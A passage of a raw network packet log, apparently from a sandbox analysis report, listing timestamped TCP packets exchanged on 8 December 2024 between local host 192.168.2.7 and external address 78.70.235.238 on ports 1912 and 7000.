                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.714534044 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.714541912 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.714683056 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.714693069 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.714700937 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.714711905 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.714803934 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.714812994 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.714864016 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.714962006 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.715020895 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.715109110 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.715117931 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.715128899 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.715256929 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.715373039 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.715382099 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.715473890 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.715482950 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.715491056 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.715740919 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.715750933 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.715759993 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.715780973 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.715790987 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.715797901 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.716013908 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.716023922 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.716032028 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.716083050 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.716092110 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.716099977 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.716181040 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.716191053 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.716198921 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.716320038 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.716330051 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.716337919 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.716497898 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.716511011 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.717837095 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.717845917 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.718126059 CET499751912192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.718216896 CET499751912192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.825124025 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.825135946 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.825143099 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.825187922 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.825854063 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.826075077 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.826083899 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.826277018 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.826431036 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.827331066 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.827339888 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.827433109 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.827441931 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.827459097 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.828495979 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.828612089 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.828623056 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.828633070 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.829628944 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.829699993 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.829838037 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.829847097 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.829855919 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.829865932 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.829905987 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.829915047 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.830116034 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.830277920 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.830287933 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.830296993 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.830306053 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.830364943 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.830523968 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.830709934 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.830719948 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.830729008 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.830738068 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.830746889 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.830913067 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.830921888 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.830929995 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.831027031 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.831036091 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.831043959 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.831054926 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.831170082 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.831178904 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.831267118 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.831357956 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.831367016 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.831376076 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.831449032 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.831607103 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.831617117 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.831839085 CET499751912192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.837686062 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.837718010 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.837831020 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.837841988 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.837850094 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.837950945 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.838185072 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.838277102 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.838548899 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.838622093 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.838633060 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.838640928 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.838820934 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.838829994 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.838862896 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.838922977 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.838932991 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.839167118 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.839265108 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.839428902 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.839441061 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.839550018 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.839713097 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.839723110 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.839732885 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.839901924 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.839911938 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.839920998 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.839961052 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.839971066 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.951445103 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.951531887 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.951669931 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.951688051 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.951752901 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.951967955 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.952080011 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.952153921 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.952255011 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.952328920 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.952421904 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.952466965 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.952605009 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.952615023 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.952729940 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.952739000 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:32.362569094 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:32.363456011 CET499751912192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:32.469225883 CET498377000192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:32.482800961 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:32.588515997 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:32.768749952 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:32.799034119 CET498377000192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:32.830923080 CET499751912192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:32.872415066 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:32.918406963 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:32.918545961 CET498377000192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:33.039884090 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:33.200149059 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:33.204531908 CET498377000192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:33.327588081 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:33.392117023 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:33.515372992 CET498377000192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:34.254946947 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:34.312266111 CET498377000192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:34.336258888 CET498377000192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:34.455714941 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:34.455828905 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:34.456068993 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:34.456203938 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:34.456222057 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:34.456233025 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:34.456353903 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:39.269114017 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:39.312310934 CET498377000192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:39.352190971 CET498377000192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:39.471623898 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:39.471668005 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:39.471726894 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:39.471736908 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:39.471831083 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:39.471842051 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:39.471925020 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:44.081835032 CET498377000192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:44.201548100 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:44.263695002 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:44.304048061 CET498377000192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:44.423518896 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:44.423532963 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:44.423561096 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:44.423671007 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:44.423680067 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:44.423687935 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:44.482616901 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:44.507538080 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:44.513231039 CET498377000192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:44.633765936 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:46.253071070 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:46.263448000 CET498377000192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:46.384145975 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:46.968302011 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:46.968445063 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:46.968880892 CET498377000192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:46.971203089 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:46.971362114 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:46.973345041 CET498377000192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:46.977142096 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:46.977261066 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:46.977324009 CET498377000192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:46.983031988 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:46.983129978 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:46.983191967 CET498377000192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:46.988982916 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:46.989037037 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:46.989352942 CET498377000192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:46.994821072 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:46.994931936 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:46.995095968 CET498377000192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:47.000751019 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:47.000855923 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:47.001167059 CET498377000192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:47.006630898 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:47.006742954 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:47.007065058 CET498377000192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:47.012566090 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:47.012641907 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:47.012814045 CET498377000192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:47.018475056 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:47.018609047 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:47.018742085 CET498377000192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:47.024414062 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:47.024517059 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:47.024838924 CET498377000192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:47.030309916 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:47.030409098 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:47.030926943 CET498377000192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:47.036231995 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:47.036386013 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:47.036590099 CET498377000192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:47.042133093 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:47.042227983 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:47.043065071 CET498377000192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:47.048012018 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:47.048111916 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:47.048382998 CET498377000192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:47.053936005 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:47.054080009 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:47.054207087 CET498377000192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:47.060014963 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:47.060060978 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:47.060389042 CET498377000192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:47.065762043 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:47.065880060 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:47.066030979 CET498377000192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:47.071830988 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:47.071978092 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:47.077552080 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:47.077584982 CET498377000192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:47.077699900 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:47.079603910 CET498377000192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:47.094177961 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:47.094249010 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:47.094397068 CET498377000192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:47.096448898 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:47.096539974 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:47.097050905 CET498377000192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:47.101418972 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:47.101562023 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:47.101712942 CET498377000192.168.2.778.70.235.238
